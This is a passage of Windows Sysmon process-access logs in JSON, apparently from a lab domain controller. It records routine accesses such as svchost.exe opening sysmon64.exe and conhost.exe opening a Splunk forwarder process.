C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7932,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7933,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7934,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7935,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7936,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7937,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7938,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00108E8F0F00}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:42.084","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2292-5F25-0000-00108E8F0F00}","TargetProcessId":"2176","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7939,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:42.084\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2292-5F25-0000-00103A910F00}\r\nTargetProcessId: 4468\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\